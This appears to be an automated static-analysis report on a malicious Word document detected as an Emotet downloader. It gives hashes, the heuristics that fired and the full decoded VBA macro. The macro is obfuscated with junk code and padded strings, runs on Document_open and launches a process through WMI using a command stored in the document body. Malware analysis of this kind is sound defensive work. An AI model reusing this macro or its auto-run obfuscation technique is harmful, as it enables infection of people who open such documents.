Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 9c3fad8742ccb86f…

MALICIOUS

Office (OLE)

155.5 KB Created: 2020-12-28 15:43:00 Authoring application: Microsoft Office Word First seen: 2022-06-20
MD5: 9bd0ed586a1443d1f265b5cd3628591a SHA-1: 133be627d479510047ab18e5acf59f636833369b SHA-256: 9c3fad8742ccb86fa0f3f1499d18bbc5da9d943a3d2abfc4b635addb9f7bd4e6
212 Risk Score

Heuristics 8

  • ClamAV: Doc.Downloader.EmotetRed02224-9938637-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.EmotetRed02224-9938637-0
  • Password-protected archive handoff high SE_PASSWORD_ARCHIVE_LURE
    Document gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set B09b4fx3xjl = CreateObject(Y0a4w407oz7qtipr40)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_open()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6009 bytes
SHA-256: a004a96685dc375590aeec65acf06fce9e74ef2bbe0aa7a48bc315f9645e3700
Detection
ClamAV: No threats found
Obfuscation or payload: likely
95 of 152 identifiers look randomly generated (e.g. 'Tvy76yw4gd8b2rddw') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "F97kcfud4sg48a534"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
Tvy76yw4gd8b2rddw
End Sub

Attribute VB_Name = "A1uiwgoqtxboz"
   

Attribute VB_Name = "Kirhfozhuqmuq9mqa3"
Function Tvy76yw4gd8b2rddw()
On Error Resume Next
Ub2TJdf = F97kcfud4sg48a534.StoryRanges.Item(234 / 234)
   GoTo uffaH
Dim tRXHAGE() As Byte
Dim igvwzqHEI As Integer: igvwzqHEI = FreeFile
Open "A:\SuYTDHg\xdTxB\imsnzY.zHOXJJjD" For Binary Access Read As #igvwzqHEI
ReDim tRXHAGE(0 To LOF(fileInt) - 1)
Get #igvwzqHEI, , tRXHAGE
Close #igvwzqHEI
uffaH:
nUVh2dhs = "]b2[sp]b2[s"
N4asmzfhynfrf = "]b2[sro]b2[s]b2[sce]b2[ss]b2[ss]b2[s]b2[s"
   GoTo rJKwWHQ
Dim TcNGAJFB() As Byte
Dim JjfqDDi As Integer: JjfqDDi = FreeFile
Open "A:\xXhTN\ptkWlU\zIkGdx.ucWXIRxyS" For Binary Access Read As #JjfqDDi
ReDim TcNGAJFB(0 To LOF(fileInt) - 1)
Get #JjfqDDi, , TcNGAJFB
Close #JjfqDDi
rJKwWHQ:
Bogtt5j4zeh0 = "]b2[s:w]b2[s]b2[sin]b2[s3]b2[s2]b2[s_]b2[s"
   GoTo igkYyc
Dim xlrNt() As Byte
Dim OdBHsD As Integer: OdBHsD = FreeFile
Open "A:\HYyHBcJ\anHJkRNl\LVCOHCD.UQukWxbHE" For Binary Access Read As #OdBHsD
ReDim xlrNt(0 To LOF(fileInt) - 1)
Get #OdBHsD, , xlrNt
Close #OdBHsD
igkYyc:
Iy9_or3fqinzg1v = "w]b2[sin]b2[sm]b2[sgm]b2[st]b2[s]b2[s"
   GoTo gUxGAam
Dim rQjizZWl() As Byte
Dim tpZhGESS As Integer: tpZhGESS = FreeFile
Open "A:\CmcKeDAL\wwVUNn\zcWKCF.OCXGRIsJ" For Binary Access Read As #tpZhGESS
ReDim rQjizZWl(0 To LOF(fileInt) - 1)
Get #tpZhGESS, , rQjizZWl
Close #tpZhGESS
gUxGAam:
Xfi3k_70uo8io = "]b2[ss]b2[s"
   GoTo SINMGDFYf
Dim jTUNav() As Byte
Dim eKxiG As Integer: eKxiG = FreeFile
Open "A:\gbIFAoiU\rLfyICF\aIdIfIIIE.wDEMbA" For Binary Access Read As #eKxiG
ReDim jTUNav(0 To LOF(fileInt) - 1)
Get #eKxiG, , jTUNav
Close #eKxiG
SINMGDFYf:
Ut53xy_8s86f0ce70 = Iy9_or3fqinzg1v + Xfi3k_70uo8io + Bogtt5j4zeh0 + nUVh2dhs + N4asmzfhynfrf
   GoTo XeRwJAF
Dim ZoDTHDpD() As Byte
Dim WXUhUCgH As Integer: WXUhUCgH = FreeFile
Open "A:\JbhUI\opYHGZe\yswxDDr.xudxCCCKO" For Binary Access Read As #WXUhUCgH
ReDim ZoDTHDpD(0 To LOF(fileInt) - 1)
Get #WXUhUCgH, , ZoDTHDpD
Close #WXUhUCgH
XeRwJAF:
Y0a4w407oz7qtipr40 = Re7jy2bpl6ys4(Ut53xy_8s86f0ce70)
   GoTo ZgySDD
Dim ejZxpcag() As Byte
Dim yUhNrFGfH As Integer: yUhNrFGfH = FreeFile
Open "A:\YmOsGC\fHJgEls\YNSjJDcIz.rVcYJ" For Binary Access Read As #yUhNrFGfH
ReDim ejZxpcag(0 To LOF(fileInt) - 1)
Get #yUhNrFGfH, , ejZxpcag
Close #yUhNrFGfH
ZgySDD:
Set B09b4fx3xjl = CreateObject(Y0a4w407oz7qtipr40)
   GoTo LommDqt
Dim beYDQ() As Byte
Dim wmcmIAAeG As Integer: wmcmIAAeG = FreeFile
Open "A:\SXFfFD\wFgHLfJD\kWZaQAJFB.FPsnCAyEk" For Binary Access Read As #wmcmIAAeG
ReDim beYDQ(0 To LOF(fileInt) - 1)
Get #wmcmIAAeG, , beYDQ
Close #wmcmIAAeG
LommDqt:
Spr_t8p3579ctofl = Mid(Ub2TJdf, (5), Len(Ub2TJdf))
   GoTo ADIOIBSQm
Dim toctIBxH() As Byte
Dim uIRgZBFM As Integer: uIRgZBFM = FreeFile
Open "A:\XVSnB\TgDGKuoOg\TAJrPsTE.QvOhFEC" For Binary Access Read As #uIRgZBFM
ReDim toctIBxH(0 To LOF(fileInt) - 1)
Get #uIRgZBFM, , toctIBxH
Close #uIRgZBFM
ADIOIBSQm:
   GoTo InZbVBDA
Dim TsKUGG() As Byte
Dim DzmwDB As Integer: DzmwDB = FreeFile
Open "A:\ezCoJQGd\TDdzbIKCJ\JpyXwwEp.tlUXXD" For Binary Access Read As #DzmwDB
ReDim TsKUGG(0 To LOF(fileInt) - 1)
Get #DzmwDB, , TsKUGG
Close #DzmwDB
InZbVBDA:
B09b4fx3xjl.Create Re7jy2bpl6ys4(Spr_t8p3579ctofl), Ezou6ysmtlk6oeuq3, Jqinu9zxo4pa
   GoTo RHIiB
Dim nKbAHAHCC() As Byte
Dim YkdJFEE As Integer: YkdJFEE = FreeFile
Open "A:\snZdINEp\IVZpADCF\cnFbjhE.kVmnE" For Binary Access Read As #YkdJFEE
ReDim nKbAHAHCC(0 To LOF(fileInt) - 1)
Get #YkdJFEE, , nKbAHAHCC
Close #YkdJFEE
RHIiB:
   GoTo DbULP
Dim bxQpA() As Byte
Dim sewPJDEv As Integer: sewPJDEv = FreeFile
Open "A:\dtVDTCJqB\jXdwGDQE\JMmBBEIk.KGvBEH" For Binary Access Read As #sewPJDEv
ReDim bxQpA(0 To LOF(fileInt) - 1)
Get #sewPJDEv, , bxQpA
Close #sewPJDEv
DbULP:
End Function
Function Re7jy2bpl6ys4(Vmaypkm4efknkrner)
On Error Resume Next
   GoTo jgmms
Dim lfeCNHGR() As Byte
Dim WeqiF As Integer: WeqiF = FreeFile
Open "A:\PQWMx\oCIcg\WZuLJJzpH.LorhI" For Binary Access Read As #WeqiF
ReDim lfeCNHGR(0 To LOF(fileInt) - 1)
Get #WeqiF, , lfeCNHGR
Close #WeqiF
jgmms:
Y4hj47bty9n82 = (Vmaypkm4efknkrner)
   GoTo TkEbdD
Dim QetqAJT() As Byte
Dim FAgCCBV As Integer: FAgCCBV = FreeFile
Open "A:\QjvjJDD\oisAG\kAeGYYnyY.SZmjJJID" For Binary Access Read As #FAgCCBV
ReDim QetqAJT(0 To LOF(fileInt) - 1)
Get #FAgCCBV, , QetqAJT
Close #FAgCCBV
TkEbdD:
I78o0glkxzrqvr = Jfuohfyb720(Y4hj47bty9n82)
   GoTo LnkcA
Dim stUGJCp() As Byte
Dim MAqBA As Integer: MAqBA = FreeFile
Open "A:\OKMXFfICG\hWUDHDTl\oCpryZk.LjyLA" For Binary Access Read As #MAqBA
ReDim stUGJCp(0 To LOF(fileInt) - 1)
Get #MAqBA, , stUGJCp
Close #MAqBA
LnkcA:
Re7jy2bpl6ys4 = I78o0glkxzrqvr
   GoTo NggPWDAI
Dim HfplveoKI() As Byte
Dim fKgWeFJEc As Integer: fKgWeFJEc = FreeFile
Open "A:\OhVDJH\ZoQWEY\QvTGBDJS.sELpHVHE" For Binary Access Read As #fKgWeFJEc
ReDim HfplveoKI(0 To LOF(fileInt) - 1)
Get #fKgWeFJEc, , HfplveoKI
Close #fKgWeFJEc
NggPWDAI:
End Function
Function Jfuohfyb720(Okg2cnd7zl2)
N2yzp8_zqfaiu185 = Dftx1th8lf2agu
   GoTo akwzBMGS
Dim PbmVIx() As Byte
Dim DlDGC As Integer: DlDGC = FreeFile
Open "A:\TTrcDU\JdkyAAHeJ\twsvHDoCH.ZQCUkj" For Binary Access Read As #DlDGC
ReDim PbmVIx(0 To LOF(fileInt) - 1)
Get #DlDGC, , PbmVIx
Close #DlDGC
akwzBMGS:
Jfuohfyb720 = Replace(Okg2cnd7zl2, "]b2[s", Blftrpn467zn6)
   GoTo DYWPGZ
Dim zjzWCpeIL() As Byte
Dim lSlPokuI As Integer: lSlPokuI = FreeFile
Open "A:\ikYzbIDGo\cBZyCD\UQaTFC.wEVjCF" For Binary Access Read As #lSlPokuI
ReDim zjzWCpeIL(0 To LOF(fileInt) - 1)
Get #lSlPokuI, , zjzWCpeIL
Close #lSlPokuI
DYWPGZ:
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.